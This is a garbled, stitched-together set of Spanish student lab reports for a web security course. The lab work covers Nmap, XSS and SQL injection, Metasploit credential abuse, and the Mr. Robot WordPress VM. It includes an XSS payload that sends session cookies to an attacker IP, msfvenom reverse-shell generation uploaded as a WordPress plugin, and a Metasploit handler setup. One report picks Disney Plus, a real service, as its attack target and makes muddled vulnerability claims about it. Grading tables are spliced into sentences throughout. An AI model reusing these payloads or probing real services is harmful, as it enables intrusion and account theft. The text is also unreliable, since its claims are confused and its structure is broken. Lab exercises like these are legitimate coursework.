DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 4 Centro de cómputo Pentesting Objetivo Conocer y comprender el uso del NMAP Nombre del alumno Matrícula Wilberth Rafael Madera Poot 04200014 Estado del arte Son una herramienta esencial para la seguridad de las empresas y las organizaciones ya que están evolucionando constantemente para adaptarse a las nuevas amenazas y tecnologías. Descripción 1. Con base a la explicación del docente, el alumno instalará el nmap https://nmap.org/download 2. El alumno analizará la red del centro de cómputo con los comandos indicados y realizará capturas de los resultados 3. A completar el formato de práctica y colocar en el desarrollo la captura de los laboratorios resueltos, colocar en las imágenes lo aprendido en ese laboratorio. 4. Entregar este formato por alumno https://nmap.org/downloadpoder atacar diferentes sistemas con la finalidad de encontrar y poder prevenir posibles fallos en el mismo en este caso tendremos que buscar algún objetivo para poder hacer nuestro test de penetración ya que tendremos que determinar los alcances de los fallos de seguridad que este sistema pueda tener en este caso utilizaremos como objetivo a Disney plus para poder saber que posibles fallos que pueda tener. Para esta parte utilizaremos NMAP para poder hacer un un mapeo ya que nos permite encontrar dispositivos que se ejecutan en la red y podemos descubrir los puertos y servico abiertos y podemos detectar las vulnerabilidades y poder entrar al sistema podemedio de las vulnerabilidad ya que si no estan parchadas estas podemos acceder pormedio de un expoit. Ahora como parte ahora entraremos a nuestro Nmap para poder hacer el mapeo. Una vez que tenemos el mapeo checamos que puertos tienen para poder saber donde podemos atacar en este caso tenemos los puertos de 80 y el puerto 443 El pueto 80 tiene la vulnerabilidad de un ataque de denegacion de servico que envian span con los encabezados http qu estan icompletos bloqueando el acceso de este y el pueto 443 tenemos que podemos hacer una inyeccion SQL ya que podemos hacer las secuencias con comando entre llos sitios para poder falsificar las solicitudes en el sitio Tambien conocemos que servico usa para poder hacer que este su contenido en linea sea trasmitido es el de Akamai ya que es una corporación que provee, entre otros servicios, una plataforma de computación distribuida para poder entregar contenidos a nivel global Pues en los resultados que obtenimos no pudimso identidficar que dispositivos usa y que sistema poertaivo corren en ellos Conclusiones personales En esta práctica aprendimos utilizar las herramienta que tenemos en el área de ciber seguridad en este caso usamos La app de NMAP para poder tomar la información para poder saber que tan vulnerable es el equipo que queremos atacar para eso sirve NMAP ya que usamos tuvimos que ver la vulnerabilidad para luego poder pasar con podemos con el Metasploit para poder acceder al sitio ya que nos permite explotar la vulnerabilidad y poder hacer diversas modificaciones al sistema para así tener el control de la maquina que queremos penetrar el sistema Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la práctica sin errores Se entregó parcialmente funcionando la práctica Se entregó sin funcionar Tiempo y forma Se entregó en tiempo y con el formato adecuado Se entregó en tiempo o con el formato adecuado No se entregó Contenido Tiene todos los Casi todos los No tiene todos los Para poder saber esta informacion usamos algunos comandos basicos para poder usar nmpa y poder saber que direccion ip tiene ya que al momento de usar ping para poder conectarnos no nos muestra muchos datos pero al usarlo con el nmap pudimos obtener mas informacion detallada ya que podemos intentar con otros sitios que empiecen con triple w para poder aplicar el ping y poder accerder ala informacion que nesesitemos para poder atacar apartados correctamente escritos apartados están correctamente escritos apartados correctamente escritos Fotografías o vídeo Muestra el Muestra parcialmente No hay vídeo o no (evidencia) funcionamiento el funcionamiento de la muestra el completo de la práctica práctica en su reporte funcionamiento de la desde el inicio, práctica en su reporte desarrollo y final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales de cada personales de cada personales de cada integrante del equipo integrante del equipo integrante del equipo de lo que hizo y la de lo que hizo o la de lo que hizo ni la conclusión grupal es la conclusión grupal es la conclusión grupal es la misma de todo el grupo misma de todo el grupo misma de todo el grupo Ortografía No tiene ninguna falta ortográfica Tiene algunas faltas ortográfica, cada una se le descuenta 1 punto Todo el documento esta lleno de errores ortográficos. 1 Instituto Tecnológico Superior Progreso Instituto Tecnológico Superior Progreso CARRERA: Ingeniería en Sistemas Computacionales MATERIA: Seguridad en la Web Actividad: Actividad 3 Reporte Docente: Edgar Alejandro Sagundo Duarte Alumno: Wilberth Rafael Madera Poot SEMESTRE: 7mo 2 CONTENIDO Instituto Tecnológico Superior Progreso RESUMEN .................................................................................................................................................... 3 EVALUACIÓN DE AMENAZAS ....................................................................................................................... 3 EVALUACIÓN DE VULNERABILIDADES .......................................................................................................... 4 CONTROLES DE ACCESO ............................................................................................................................... 4 MÚLTIPLES PUERTOS ENCONTRADOS ............................................................................................................................................................. 5 MONITOREO Y DETECCIÓN .......................................................................................................................... 6 ACTUALIZACIONES Y PARCHES ..................................................................................................................... 7 CONCLUSIÓN ............................................................................................................................................... 8 RECOMENDACIONES FINALES ...................................................................................................................... 8 3 RESUMEN: EVALUACIÓN DE AMENAZAS: Instituto Tecnológico Superior Progreso Se presenta este informe. Dónde aborda la evaluación de esta infraestructura ya que se identificaron vulnerabilidades potenciales ya que se propone medidas correctivas para poder fortalecer su seguridad para poder evitar posibles ataques a la infraestructura Recopilamos la información de al sitio de plaza de las motos para poder recopilar algunos datos de las vulnerabilidades ya que esta esta en direcciones y dominós publicas ya estos no están disponible pero nosotros al realizar de manera que podamos saber si tenemos acceso comprobamos haciendo un ping al sitio dándonos como respuestas exitosa. 4 CONTROLES DE ACCESO: Instituto Tecnológico Superior Progreso Hemos encontrado un servicio de SMTP abierto en el puerto 465 ya que esto indica que el sistema utiliza una configuración de correo seguro a través de un SSL ya que la versión especifica es Exim 4.96.2 Esta información la pudimos obtener con nuestra herramienta de nmap para hacer un escaneo de los servicios y poder verificar las configuraciones de SSL al momento de buscar en este momentos nos percatamos que encontramos más puertos están abierto ya que esto puede ocasionar de manera que pueda hacer un ataque EVALUACIÓN DE VULNERABILIDADES: S llevo Acabo el escaneo y detectamos posibles vulnerabilidades en el sistema ya que se identificó varios puertos expuestos para será atacados y se recomienda priorizar las vulnerabilidades posibles ya que estas pueden ser criticas y se recomiendan su mitigación inmediata ya que de lo contrario no serán expuesta y ahí habría un ataque. Al momento de leer detalladamente las información recabada siendo encontrada sin embargo hay algunasexplicaciones esto puede se que sea de manera que 5 MÚLTIPLES PUERTOS ENCONTRADOS: Instituto Tecnológico Superior Progreso sea un acceso físico o lógico ya que la información es posible que sea necesario para poder implementar controles adicionales en caso necesario También el puerto ssh tiene un acceso de contraseñas ya que esta son débiles y también pueden ser vulneradas de manera que las credenciales de estas pueden ser las predeterminadas ya que se le pude hacer un explota para poder sacar las credenciales de estas ya que estas pueden salir con ataques de fuerza bruta con múltiples combinaciones hasta encontrar a la correcta y se evaluaron la mayoría de los controle de acceso ,destacado la importancia de estas. 6 MONITOREO Y DETECCIÓN: Instituto Tecnológico Superior Progreso Se revisaron las capacidades de monitoreo de eventos de seguridad. Que se sugiere por cual puertos se pueden atacar de manera más fácil ya que esto puede hacer que algunas veces los usuarios dejan un mucho puerto ya que estos se pueden interpretar que tiene la facilidad de atacar y al mismo tiempo estar siendo atacados por la empresa 7 ACTUALIZACIONES Y PARCHES: Instituto Tecnológico Superior Progreso Se les recomienda hacer un procesos más robustos para poder protegerse para ataques a futuro ya que no hay que darle oportunidad a los atacantes para que no sean vulnerados y tener en cuenta que las actualizaciones de los equipos y parches de seguridad en todos los sistemas para estar más seguros ya que estos no cuentan con las actualizaciones que se recomienda tanto como de parte de la programación compárate de los sistemas operativo ya que las licencias vencen el primero de enero de 2024. 8 Conclusión: RECOMENDACIONES FINALES: Instituto Tecnológico Superior Progreso En esta ocasión es un aspecto de critico ya que se requiere atención inmediata para implementación de medidas de seguridad ya que requiere fortalecer de manera significativa la postura de la organización tomando en cuenta que esta es una información didáctica para simular ataques que se pudieran hacer de manera que pueda afectar al momento de un ataque. 1. Actualizar y parchear sistemas regularmente. 2. Reforzar controles de acceso, incluyendo autenticación multifactor. 3. Implementar soluciones avanzadas de detección de intrusiones. 4. Establecer y practicar regularmente un plan de respuesta a incidentes. 5. Continuar la formación en ciberseguridad para el personal. UNIDAD 4 INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 4 Centro de cómputo Cross site scripting(xss) Objetivo Entrar al usuario de administrador con un ATAQUE CROSS SITE SCRIPTING (xss) Nombre del alumno Matrícula Miguel angel de la cruz centeno. 04200007 Wilberth Rafael Madera poot 04200014 Estado del arte ATAQUE CROSS SITE SCRIPTING (xss) Descripción 1. Con base a la explicación del Documento hacer el ATAQUE CROSS SITE SCRIPTING (xss) dado por el docente. Desarrollo ATAQUE CROSS SITE SCRIPTING (xss) En esta actividad llevaremos a cabo un ataque Cross site scripting (xss) en el que un actor malintencionado logra inyectar un script malicioso en páginas o aplicaciones web. Para llevar a cabo este ejercicio, se utilizará la máquina virtua-vl “PENTESTER LAB: XSS AND MYSQL FILE” de vulnhub y el navegador FireFox. Paso 1. Comenzamos el ataque tratando de inyectar un script básico como <script>alert(‘xss’)</script> , en cada una de las entradas del formulario, con el objetivo de encontrar la entrada que permite ejecutarlo. La figura 2 muestra que en la entrada “Text”, se encuentra la vulnerabilidad. Figura 1: Formulario de la página. Paso 2. Al realizar el submit, el script se ejecutará y mostrará el mensaje “xss”, tal como se representa en la figura 2. A través de este Script básico, podemos confirmar de manera concluyente que esta aplicación web es vulnerable. Figura 2: inyección de un script la entrada “Text” del formulario. Paso 3. La máquina virtual alberga un script que actúa como un usuario administrador que inicia una sesión periódica. Como atacantes, nuestro objetivo es obtener la cookie de la sesión de este usuario mediante Cross site scripting. Para lograrlo, emplearemos el siguiente script en la entrada “Text”, tal como se representa en la figura 3. Se debe sustituir la url por tu IP privada. <script>document.write('<img src="http:192.168.10.14:8585'+document.cookie+' "/>');</script> Figura 3: inyección de un script para obtener cookies en la entrada “Text” del formulario. Al realizar el submit, se ejecutará el primer blog que subimos al inyectar el script básico que mostraba un alert de JS, tal como se representa en la figura 4. En la figura 5, se muestra un icono de archivo desconocido debido a la subida de un blog de naturaleza desconocida. Figura 4: ejecución de un alert a causa del primer script básico inyectado anteriormente. Figura 5: Comentario de naturaleza desconocido al inyectar un script de cross site scripting. Paso 4. Usando python3, iniciamos un servidor http local en el puerto 8585 con el propósito de escuchar las solicitudes al mismo y, por lo tanto, recibir las cookies que se transmiten al servidor a través del protocolo http en el puerto especifico, tal como se representa en la figura 6. Figura 6: ejecutando el comando http.server para iniciar un servidor http. La figura 7 muestra como nuestro servidor local recibe la cookie de sesión del usuario administrador. Figura 7: servidor http local recibiendo la cookie de sesión del usuario administrador. Paso 5. En el formulario “Login” mostrado en la figura 8, procederemos a realizar una inspección para ubicar la opción “Storage” en el menú de la herramienta “inspector” del navegador. En la sección “cookies” cambiamos el campo “Value” por la cookie de la sesión que robaremos, tal como se representa en la figura 9. Figura 8: formulario login para iniciar sesión como administrador. Figura 9: sección de cookies del inspector en el navegador Firefox en la columna Value. Por último, accedemos a la ruta de /admin, tal como se muestra en la figura 10. Como se muestra en la figura 10, se representa el formulario de “administrador de mi blog” al cual el navegador nos redirigirá debido a que habíamos obtenido una cookie de sesión del administrador. Figura 10: ruta de administrador. Figura 10: Formulario de administración del Blog. Inyeección SQL en Mysql En esta actividad, llevaremos a cabo una inyección de SQL, el cual tiene como objetivo explotar la vulnerabilidad que permite la inyección de sentencias desde la URL con el fin de acceder y capturar información de una base de datos. En la figura 12 se representa el formulario que, como actores maliciosos debemos inyectarle sql. Figura 11: formulario para atacar. En la barra de navegación de Firefox, ejecutaremos la sentencia “order by” para determinar el número de campos que tiene la tabla actual, tal como se representa en la figura 13. Figura 12: sentencia order by para hallar el número de columnas que tiene una tabla. Ejecutaremos la sentencia que se ve en la figura 14 para visualizar las tablas que forman parte del esquema de la base de datos. Se puede observar que existe varias tablas, pero nuestro objetivo es la tabla “users”. Figura 13: sentencia UNION para visualizar las tablasdel esquema de la base de datos. Ejecutaremos la sentencia que se muestra en la figura 15 para visualizar los campos de la tabla “users”. Figura 14: sentencia UNION para visualizar los campos de la tabla “users”. Por último, ejecutamos la última sentencia que se muestra en la figura 15 para visualizar los nombres de usuario junto con sus contraseñas de la tabla “users”. Figura 15: sentencia UNION para visualizar los nombres de usuario junto con sus contraseñas. Finalmente, convertimos el string en un MD5 hash para saber la contraseña del administrador para después iniciar sesión como administrador, como se muestra en la figura 16. Figura 16: iniciando sesión como administrador. Conclusiones personales Miguel Angel: En esta práctica se aprendió a como hacer un ataque de CROSS SITE SCRIPTING (xss), buscado una invulnerabilidad en la página analizando el formulario y probando cada uno de los campos hasta buscar una vulnerabilidad después de buscarlo se hace una inyección de un script en la entrada “Text” del formulario desde ahí se desarrolla el ataque buscando los cookies para que nos de la contraseña después al ultimo paso convertimos el string que nos da y lo convertimos en un MD5 hash desde ahí tenemos la contraseña del administrador. Wilberth Madera: En esta práctica pudimos observar y poner en practica de como hacer un ataque de Cross site scripting donde pudimos buscar una vulnerabilidad en la página donde nosotros pudimos analizar en la pagina del formulario y poder comprobar cada uno de los campos hasta que busquemos una vulnerabilidad una ves que pudimos buscarlo le hacemos un ataque inyección de un script en la entrada de los campos que tiene para poder agregar información una vez que terminamos con el formulario pasamos a hacerle una inyección SQL para poder obtener las cookies para poder hacer que nos de la contraseña una vez que tengamos esto nos dará la contraseña en los campos de texto que están para luego pasarlo para poder desencriptar y así tener la contraseña. Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la Se entregó parcialmente Se entregó sin funcionar práctica sin errores funcionando la práctica Tiempo y forma Se entregó en tiempo y con Se entregó en tiempo o con No se entregó el formato adecuado el formato adecuado Contenido Tiene todos los apartados Casi todos los apartados No tiene todos los correctamente escritos están correctamente apartados correctamente escritos escritos Fotografías o vídeo Muestra el funcionamiento Muestra parcialmente el No hay vídeo o no muestra (evidencia) completo de la práctica funcionamiento de la el funcionamiento de la desde el inicio, desarrollo y práctica en su reporte práctica en su reporte final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales de cada personales de cada personales de cada integrante del equipo de lo integrante del equipo de lo integrante del equipo de lo que hizo y la conclusión que hizo o la conclusión que hizo ni la conclusión grupal es la misma de todo grupal es la misma de todo grupal es la misma de todo el grupo el grupo el grupo Ortografía No tiene ninguna falta ortográfica Tiene algunas faltas ortográfica, cada una se le descuenta 1 punto Todo el documento esta lleno de errores ortográficos. En esta práctica de gestión de credenciales se realizó para poder comprobar la administración y la comprobación de y la protección al momento de vulnerar algún equipo de cómputo ya que podemos saber el nombre de usuario como también la contraseñas Para esta primera parte se realizó el laboratorio de Credencial Management para esto tendremos dos equipos uno Windows y una maquita con Linux para esto cambiaremos a la máquina que queremos vulnerar que en este caso es el de Windows Desarrollo INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 7 Taller de redes Community Labs Objetivo Aprender a encontrar vulnerabilidades en las aplicaciones Nombre de los integrantes de equipo Matrícula Wilberth Rafael Madera Poot 04200014 Estado del arte una amplia gama de tecnologías y prácticas diseñadas para proteger sistemas, redes y datos de amenazas digitales. Descripción 1. El alumno entrará a la página de https://attackdefense.com/ y se registrará o acceder con la cuenta de gmail 2. Una vez que se ingrese al sitio, se accederá al laboratorio online 3. En la parte izquierda del menú aparecerá en Community Labs 4. Seleccionar HTTP Request Smuggling o elegir otras opciones y presionará el botón Start 5. Aparecerá una nueva pestaña emuladora de Linux 6. Seguir el manual en pdf de cada una de las opciones y pegar capturas de su ejecución con descripción de lo que se realiza. 7. Completar las secciones de la práctica https://attackdefense.com/ A continuación ejecutamos en el PowerShell runas.exe /savecred /user: administrador cmd whoami y nos desplegara Una vez que estemos dentro de la máquina que queremos atacara para tenderemos que verificar las diferentes credenciales que estén alojadas dentro de esta máquina para esto tendremos que abrir el PowerShell para poder ingresar el comando cmdkey/list ya que este comando nos permite ver las credenciales que están alojadas dentro de la máquina. Ahora nos cambiamos de máquina de Linux y ahora ejecutamos el módulo de hta_serve para poder obtener el acceso una ventana de símbolo de sistema ya que esto nos ermitita entrar al momento de ejecutar como el cómo el administrador ya que no tendremos que ingresar la contraseña Para esto abrimos primero meterpreter con msfconsole -q ya que con este comando nos abrirá el meterpreter por medio de Shell de meterpreter ya que nos podremos alojar en una aplicación al ser abierta se puede ejecutar un payload que está a través del PowerShell. Ahora colocamos el exploit y nos creara una dirección ip y nos da una payload el cual copiaremos y la pegaremos en el símbolo de sistema que en la máquina que vulneramos para poder tener el acceso completo al sistema Una ves que colocamos nuestro payload y ahora observamos nuestro meterpreter Observamos que ya ternemos acceso después de ingresar nuestro payload le damos enter para que nos salte Una línea para poder ingresar un comando Ejecutamos el comando de sesión -i 1 para poder obtener el acceso total de la sesión de nuestro meterpreter una vez que estamos ahí hacemos un ls para leer todo los archivos que tenemos en la maquina una vez que ubicamos la ruta en la que se ubica nuestro archivo cd C:\\Users\\Administrator\\Desktop accedemos con el cd a la ruta que esta ejecutamos el comando ls y nos aparecerá dos archivos el cual el que necesitamos se llama flag.txt para poder abrirlo necesitamos usar el comando de cat mas el nombre de nuestro archivo txt que es cat flag.txt y ahora podemos visualizar el contenido ahora copiamos el cometido. Una ves que copiamos el contenido regresamos a la página de community labs para poder verificar el contenido que nos dio en el meterpreter pegamos y le damos en subir y nos marcara que se verifico y que es el archivo correcto. Conclusiones personales Wilberth Madera: En esta practica aprendimos como objetivo a como demostrar como un atacante puede obtener el acceso a las credencialesde un usuario y que pueda tener acceso total al la maquina ya que se pueden verificar las credenciales que tengamos almacenadas en los equipos. Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la Se entregó parcialmente Se entregó sin funcionar práctica sin errores funcionando la práctica Tiempo y forma Se entregó en tiempo y con Se entregó en tiempo o con No se entregó el formato adecuado el formato adecuado Trabajo en equipo Todos los integrantes Casi todos los integrantes No trabajaron en equipo trabajaron en equipo trabajaron en equipo Fotografías o vídeo Muestra el funcionamiento Muestra parcialmente el No hay vídeo o no muestra (evidencia) completo de la práctica funcionamiento de la el funcionamiento de la desde el inicio, desarrollo y práctica en su reporte práctica en su reporte final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales expresado en personales expresado personales o esta forma técnico sin errores formalmente sin errores expresado en forma ortográficos y con formato ortográficos coloquial o tiene errores en. ortográficos. Cada error ortográfico es -1 punto INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 8 Seguridad en la web Llaves Objetivo Aprender a encontrar las llaves escondidas en diferentes locaciones para emplear wordpress Nombre de los integrantes de equipo Matrícula Geovanny Alessandro Flores Montero 04190038 Kevin Antonio Couoh Perez 04200006 Wilberth Rafael Madera Poot 04200014 Miguel Angel De La Cruz Centeno. 04200007 Estado del arte Seguridad Informática y Pruebas de Penetración, la seguridad informática y las pruebas de penetración son áreas críticas en la protección de sistemas y datos en entornos digitales. A medida que la tecnología avanza, también lo hacen las amenazas cibernéticas, lo que ha llevado al desarrollo constante de técnicas y herramientas para evaluar y fortalecer la seguridad de los sistemas. Descripción 1. El alumno en equipos realizará la práctica del documento mrrobor_wordpress 2. Una vez que se ingrese al sitio, se accederá al laboratorio online 3. Tomará capturas de pantalla de la realización de la práctica 4. Escribirá lo que realizó y sugerencias 5. Completar las secciones de la práctica y entregar Desarrollo Está práctica consiste en hallar 3 llaves escondidas en diferentes locaciones. Cada llave es progresivamente difícil de encontrar. Como inicio, haremos un escaneo de puertos a la maquina virtual que tenemos como objetivo implementando el comando nmap -sS 192.168.10.136. En la figura 1, se nos muestra los puertos cerrados y abiertos, donde destaca que el puerto http y https están abiertos. Este puerto hace vulnerable al servidor HTTP lo que nos permite realizar ataques que se estarán implementando en esta práctica. Figura 1: ejecución de nmap para el escaneo de puertos. En la barra de navegación, escribimos la IP: 192.168.10.136 de la maquina objetivo tal como se muestra en la figura 2. Figura 2: máquina virtual Mr. Robot. Parte 1 – Localizando la primera llave y un diccionario Cree un folder utilizando el comando “mkdir” en la ruta home/kali/Documents, tal como se representa en la figura 3. Figura 3: comandos para la gestión de ficheros en Linux. Acceda al folder que haya creador. Utilice el comando “nmap --script=http-enum.nse -p 80 192.168.10.136” para ver los directorios utilizados por las aplicaciones y servidores web de la máquina virtual. En la figura 4 se muestra los resultados de este comando. Figura 4: archivos del servidor web. Nuestro objetivo es hallar algún archivo que nos de el primer key de está práctica. Si realizamos una lectura al archivo “/robots.txt” desde el navegador, se nos mostrará 2 archivos curiosos tal como se ve en la figura 5. El archivo “key-1-of-3.txt” contiene la primera llave de esta práctica y el archivo “fsocity.dic” es un archivo con termino .dic, los cuales son diccionarios de palabras que generalmente se utilizan para realizar ataques de fuerza bruta. Figura 5: texto del archivo robots.txt Cree un folder utilizando el comando “mkdir” para guardar las keys de esta práctica como se representa en la figura 6. Figura 6: creación del dichero “keys Acceda al folder keys y descargue el archivo “key-1-of-3.txt” utilizando el comando “wget http://192.168.10.136/key-1-of-3.txt”. Se representa en la figura 7 los resultados después del uso de este comando. http://192.168.10.136/key-1-of-3.txt Figura 7: implementación del comando wget para descargar archivos. Utilice el comando “cat” para leet el contenido del archivo, tal como se representa en la figura 8. Figura 8: lectura del archivo de texto. Con el comando “cd ../” retrocedemos al fichero “mrrobot2”. Ahora descargue el archivo “fsocity.dic” con el comando “wget http://192.168.10.136/fsocity.dic”. Se representa en la figura 8 los resultados después de uso de este comando. Figura 9: implementación del comando wc para contar las palabras del diccionario. Guarda la key en un archivo de texto, como se muestra en la figura 10. Figura 10: implementación del comando wc para contar las palabras del diccionario. http://192.168.10.136/fsocity.dic Utilizaremos el comando “cat fsocity.dic |short| uniq > fsoc.dic|” para limpiar este archivo debido a que contiene palabras repetidas. En la figura 11, se muestra la implantación de este comando. Figura 11: implementación del comando unique para eliminar las palabras repetidas. Como parte de nuestros objetivos, como atacantes debemos estar explorando en búsqueda de vulnerabilidades. En los ataques de fuerza bruta, se suelen utilizar los mensajes de error que nos responde un login, con el objetivo de aprovecharlas como parámetros de una herramienta que se encarga de realizar el ataque. En la figura 12, se representa el formulario de un login hecha en wordpress. Este login se encuentra en el archivo “wp-login.php”. Figura 12: login wordpress. Conclusiones personales Miguel Angel: En esta práctica se inició con un escaneo de puertos con el comando nmap, para identificar puertos abiertos, este enfoque destaca la importancia de conocer las configuraciones de red y los servicios activos en una maquina virtual para encontrar posibles puntos de entradas también se demuestra la importancia de buscar información en archivos como el archivo “Robots.txt”, este archivo revela la existencia de claves importantes como el “Key-1-of-3.txt”. También se realizo un ataque de fuerza bruta, en este caso, eliminando las palabras repetidas con el comando “uniq”. Después se introduce la herramienta Hydra para llevar a cabo otra fuerza bruta. Geovanny Alessandro: En esta práctica puede aprender sobre como mediante a una página de WordPress puede tener vulnerabilidades que podría causar el mal funcionamiento de esta, por lo cual cuando yo decida trabajar con una página así ya tendré en cuenta cómo manejar la seguridad de esta. Kevin Antonio: La práctica consistió en encontrar tres llaves alojadas en distintas locaciones, además de realizar un ataque de fuerza bruta mediante la herramienta hydra al sitio de WordPress. Fue una práctica interesante, puesto que enseña cómo realizar un ataque de fuerza bruta lo cual es un término muy utilizado en el área de ciberseguridad. Wilberth Rafael: La práctica, se destacó la importancia de un escaneo meticuloso de puertos y la búsqueda estratégica de información en archivos para identificar vulnerabilidades ensistemas, especialmente en entornos WordPress. El proceso de optimizar diccionarios y realizar ataques de fuerza bruta con Hydra proporcionó valiosas lecciones sobre la eficiencia en las pruebas de penetración. Además, se exploraron vulnerabilidades específicas en WordPress, subrayando la necesidad de considerar la seguridad desde el diseño en plataformas web. Este ejercicio proporcionó una comprensión más profunda de las amenazas cibernéticas y las técnicas para mitigarlas. Criterios de evaluación Excelente Regular Mal Funcionalidad Se entregó funcionando la Se entregó parcialmente Se entregó sin funcionar práctica sin errores funcionando la práctica Tiempo y forma Se entregó en tiempo y con Se entregó en tiempo o con No se entregó el formato adecuado el formato adecuado Trabajo en equipo Todos los integrantes Casi todos los integrantes No trabajaron en equipo trabajaron en equipo trabajaron en equipo Fotografías o vídeo Muestra el funcionamiento Muestra parcialmente el No hay vídeo o no muestra (evidencia) completo de la práctica funcionamiento de la el funcionamiento de la desde el inicio, desarrollo y práctica en su reporte práctica en su reporte final en su reporte Conclusiones Tiene conclusiones Tiene conclusiones No tiene conclusiones personales expresado en personales expresado personales o esta forma técnico sin errores formalmente sin errores expresado en forma ortográficos y con formato ortográficos coloquial o tiene errores en. ortográficos. Cada error ortográfico es -1 punto Para esta práctica con junto con los conocimientos para esto tendremos que acceder en WordPress ya que debemos buscar las vulnerabilidades por medio de una inyección por Desarrollo INSTITUTO TECNOLÓGICO SUPERIOR PROGRESO Organismo Público Descentralizado del Gobierno del Estado FORMATO DE PRÁCTICA 2023B Carrera Semestre Clave de la asignatura Nombre de la materia Ingeniería en Sistemas Computacionales. 7 CID-2101 Seguridad en la Web Practica No. Laboratorio de Nombre de la practica 9 Taller de redes Inyección de objetos php en WordPress Objetivo Aprender a encontrar vulnerabilidades en las aplicaciones Nombre de los integrantes de equipo Matrícula JESUS JASER BRITO ORTIZ 04200003 KEVIN ANTONIO COUOH PÉREZ 04200006 WILBERTH RAFAEL MADERA POOT 04200014 Estado del arte Prevenir la inyección de objetos y aumentar la seguridad de manera adecuada. Descripción 1. Aparecerá una nueva pestaña emuladora de Linux 2 seguir el manual en pdf de cada una de las opciones y pegar capturas de su ejecución con descripción de lo que se realiza. 3. Completar las secciones de la práctica medio de los objetos ya que de esa forma haremos el ataque de inyección malicioso para poder tener el acceso a estos archivos de servidor y encontrar las segunda llave. Para esto tendremos que ejecutar msfvenom -p php/meterpreter_reverse_tcp LPORT=4444 LHOST=192.168.10.15 -f raw > Shell_15.php ya que con esto nos servirá para poder generar u archivo malicioso para que nos dé una Shell con los diferentes objetos que tenemos para manipular en el servidor de WordPress. Ahora nos dirigimos a la barra de navegación de WordPress ya que tendremos que buscar el archivo que generamos para poder cargar el archivo malicioso . Ahora nos dirigimos a plugin ya que colocaremos el plugin que creamos para poder disfrazar Una vez que estemos adentro de nuestro apartado para agregar plugin nos vamos a la configuración hacemos click en añadir un nuevo plugin y subimos el archivo que se nos proporciono anteriormente con el comando anterior para esto buscamos la ruta donde se encuentra este y lo subimos. Para esta parte tendremos abrir nuestro archivo de Shell para buscarlo nos dirigiremos a nuestro directorio donde entraremos ala carpeta de documentos y accedemos a la carpeta de mrrobots para luego ingresar nueva mente a nuestro apartado de subir los plugin donde este se subirá de tal forma que como nos muestra en la imagen nos indica a un mensaje que no funciono este plugin pero esta es la repuesta que deseamos ya que cuando este plugin estará ejecutando de manera que este inapercibido por el usuario. Una vez que este instalado nuestro plugin nos aprecera en la pantalla de medios el cual nuestro archivo malicioso que hemos inyectado se instalo de manera exitosa Ahora para esto nos dirigiremos para nuestro menú de Kali donde realizaremos una búsqueda de la herramienta de metaexploit framework que nos servirá para el uso de un payload en cual se deberá encargar de poder escuchara nuestro servidor de http con el cual deberá capturar el Shell que nos dio en el código malicioso que debemos inyectar en el WordPress . A continuación, utilizaremos los siguientes comandos para poder acceder con nuestro Shell y poder hacer una conexión para esto usaremos el comando de exploit /multi/headler ya que este comando sirve para poder explotar una vulnerabilidad haciendo un proceso que puede escuchar en un puerto en este caso escuchara a través del 4444 Para esto también tendremos que agregar él se set payload php/meterpreter_reverse_tcp este hace una conexión de tipo que cargue para poder usar el metaexploit ya que será para poder utilizar para cargar u binario cuando se ejecutara en la maquina con unca conexión tcp inversa Luego nos dará una dirección ip y un puerto el cual le daremos exploit para poder vulnerar y acceder Una vez que hagamos clic a nuestro archivo Shell podremos acceder al formulario donde se deberá copiar la descripción de este el cual nos da una ruta del archivo inyectado Esto nos dice que la conexión con nuestro Shell tuvimos éxito Luego ejecutados los comandos cd y ls el cd es para poder acceder a una ruta y el ls para poder visualizar los archivos que están en la maquina Una vez que estemos ahí deberemos seguir explorando y hacer una búsqueda para poder buscar los archivos ya que estos nos permitirán seguir avanzando ya que deberemos buscar ahora para eso deberemos evitar la ya que la segunda clave lo encontraremos en el directorio home para esto tendremos que hacer un cd home para acceder y luego le damos un ls para visualizar luego ejecutamos el mismo paso solo que esta ves en la carpeta llamada robot y ahí tendremos las primera clave para poder leer las claves debemos usar el comando de cat Una vez que usamos el comando de cat nos mostrara el texto de nuestro archivo ya que pero tendremos que usarlo fuera del meterpreter ya que no se podrá ejecutar el comando y no podremos leer el contenido Ahora ejecutamos el comando $fin / -perm -4000 -type f 2>/dev/null ya que este comando nos permitirá buscar archivos en el directorio que tengan un bit suid que este activado con el los permisos root ya que este permitirá que sistemas como Linux pueda ejecutar estos archivos ya que estos tiene privilegios del archivo del propietario. Conclusiones personales KEVIN ANTONIO COUOH PÉREZ: Está práctica aporta a nuestro perfil de ciberseguridad, puesto que estos laboratorios están diseñados con el objetivo de aprovechar las vulnerabilidades de los sitios web, por ejemplo; WordPress para realizar pruebas de ataque de fuerza bruta, para que al final uno pueda defenderse de esas vulnerabilidades. JESUS JASER BRITO ORTIZ: En la realización de esta actividad tuvimos
Compartir